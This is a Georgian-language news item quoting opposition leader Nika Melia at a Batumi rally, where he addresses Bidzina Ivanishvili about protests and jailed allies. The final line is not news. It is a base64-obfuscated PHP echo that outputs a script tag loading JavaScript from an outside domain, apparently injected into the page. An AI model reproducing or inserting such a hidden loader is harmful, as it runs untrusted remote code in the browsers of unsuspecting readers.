celsiusi
ავერსი შნაიდერი
“ერთიანი ნაციონალური მოძრაობის“ თავმჯდომარე ნიკა მელიამ ბათუმში აქციაზე სიტყვით გამოსვლისას „ქართული ოცნების“ ყოფილ თავმჯდომარეს ბიძინა ივანიშვილს მიმართა და განაცხადა, რომ ქართველი ხალხის დაკვეთაა, ძალიან მჭიდრო დაპირისპირებაშიც კი შევიდნენ. 
 
„მირჩევნია, მიხეილ სააკაშვილთან ერთად საკანში ვიჯდე, ან საერთოდ არ ვიყო ცოცხალი, ვიდრე ამ უნამუსობას ვუყურო, როდესაც სუს-ი, პროკურატურა, „ძველი ბიჭი,“ კრიმინალი ებრძვის ქართველ ხალხს. ჩვენ არ გვიწერია საკნებში დიდი ხანი ჯდომა, ჩვენს მეგობრებს, რომელთაც აქვს ეს თავისუფლება შეზღუდული, იქიდან გავათავისუფლებთ, მაგრამ ჩვენ რევანშს არ მოვუწყობთ, ვინც ახლა გვებრძვის.
 
საშინელებებს კადრულობენ - ფული ფულად, დაშინება დაშინებად, ძალადობა ძალადობად, ამის მიუხედავად ვერ მოიგეს არჩევნები. არ ჩათვალოთ მუქარად ბიძინა ივანიშვილო, უბრალოდ ეს არის ქართველი ხალხის დაკვეთა, რომ ჩვენ თქვენთან ძალიან მჭიდრო დაპირისპირებაშიც კი მოვიდეთ, საჭიროების შემთხვევაში, მშვიდობიანად და ხელებაწეულები. სიმრავლით დაგამარცხებთ. არ მიყვარს თარიღების დაკიდება, არ ჟღერს სერიოზულად, შევიკრიბებით და დავასრულებთ, არა! სიურპრიზებსაც მოგიმზადებთ, რომელიც გაგაკვირვებთ და რომელიც გაახარებს ამ ქვეყნის ბევრ ქომაგს. გამარჯვება არის გარდაუვალი, ერთმანეთს შევძახოთ, რომ უკან დახევა არის შეუძლებელი. ჩვენ რატომ ვწელავთ ამ ყველაფერს დროში, იცით? - მთელი მსოფლიოს თვალში ვჩანდეთ ისეთები, როგორებიც ვართ და მათ არ ჩათვალონ, რომ ოპოზიციაც კი ველურია. გვინდა ყველა პროცედურა ამოვწუროთ. ვისაც დაუოკებელი სურვილი გაქვთ, რომ რუსთავში, ციხესთან იდგეთ, არავინ გზღუდავთ, მაგრამ ბათუმშიც საპროტესტო გამოსვლები და აქტივობები უნდა დაიწყოს“, - განაცხადა ნიკა მელიამ.
 
 
857
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");